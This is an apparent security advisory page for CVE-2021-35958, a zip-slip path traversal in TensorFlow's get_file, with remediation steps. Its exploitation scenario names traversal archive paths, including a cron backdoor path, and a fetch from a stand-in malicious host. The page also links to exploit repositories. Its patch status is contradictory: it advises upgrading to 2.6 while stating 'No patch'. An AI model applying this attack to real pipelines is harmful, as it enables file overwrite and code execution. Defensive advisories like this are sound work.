CVE-2021-35958: TensorFlow: path traversal in get_file allows file overwrite
CRITICAL PoC AVAILABLEAny ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.
Risk Assessment
Critical (CVSS 9.1). No authentication or user interaction required — attackers need only serve a malicious archive at a URL fetched by the ML pipeline. The file overwrite primitive elevates readily to code execution by targeting Python scripts, config files, or model artifacts. ML training pipelines routinely download external datasets and pre-trained models at scale, making the attack surface broader than in typical application CVEs. Vendor's position that the function 'isn't meant for untrusted archives' does not reduce operational risk where pipelines consume third-party datasets.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| tensorflow | pip | — | No patch |
Do you use tensorflow? You're affected.
Severity & Risk
Attack Surface
Recommended Action
6 steps-
Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.
-
Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs — flag all instances for review.
-
Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names.
-
Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.
-
Implement file integrity monitoring on model artifacts and training data directories.
-
For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2021-35958?
Any ML pipeline using tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.
Is CVE-2021-35958 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2021-35958, increasing the risk of exploitation.
How to fix CVE-2021-35958?
1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes. 2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs — flag all instances for review. 3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfiles, use the 'data' filter (Python 3.12+) or manually check for absolute paths and '..' sequences in member names. 4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories. 5. Implement file integrity monitoring on model artifacts and training data directories. 6. For detection: scan IaC and pipeline code with semgrep rules targeting get_file.*extract and tarfile.extractall without path filtering.
What systems are affected by CVE-2021-35958?
This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments.
What is the CVSS score for CVE-2021-35958?
CVE-2021-35958 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.09%.
Technical Details
NVD Description
TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives
Exploitation Scenario
An adversary registers a lookalike domain mimicking a popular ML dataset repository or compromises a legitimate one. They publish a malicious .tar.gz archive containing a crafted entry with a traversal path such as ../../app/train.py or ../../etc/cron.d/mlbackdoor. When the ML training pipeline executes tf.keras.utils.get_file('https://malicious-host/dataset.tar.gz', extract=True), TensorFlow extracts without validating member paths. The attacker's payload overwrites a training script or scheduled task, which executes during the next model run or system event — achieving persistent code execution on ML infrastructure with the pipeline's credentials and network access.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H References
- docs.python.org/3/library/tarfile.html 3rd Party
- github.com/tensorflow/tensorflow/blob/b8cad4c631096a34461ff8a07840d5f4d123ce32/tensorflow/python/keras/README.md 3rd Party
- github.com/tensorflow/tensorflow/blob/b8cad4c631096a34461ff8a07840d5f4d123ce32/tensorflow/python/keras/utils/data_utils.py 3rd Party
- keras.io/api/ 3rd Party
- vuln.ryotak.me/advisories/52 3rd Party
- github.com/miguelc49/CVE-2021-35958-1 Exploit
- github.com/miguelc49/CVE-2021-35958-2 Exploit
Timeline
Related Vulnerabilities
CVE-2020-15196 9.9 TensorFlow: heap OOB read in sparse/ragged count ops
Same package: tensorflow CVE-2020-15205 9.8 TensorFlow: heap overflow in StringNGrams, ASLR bypass
Same package: tensorflow CVE-2020-15208 9.8 TFLite: OOB read/write via tensor dimension mismatch
Same package: tensorflow CVE-2019-16778 9.8 TensorFlow: heap overflow in UnsortedSegmentSum op
Same package: tensorflow CVE-2022-23587 9.8 TensorFlow: integer overflow in Grappler enables RCE
Same package: tensorflow
AI Threat Alert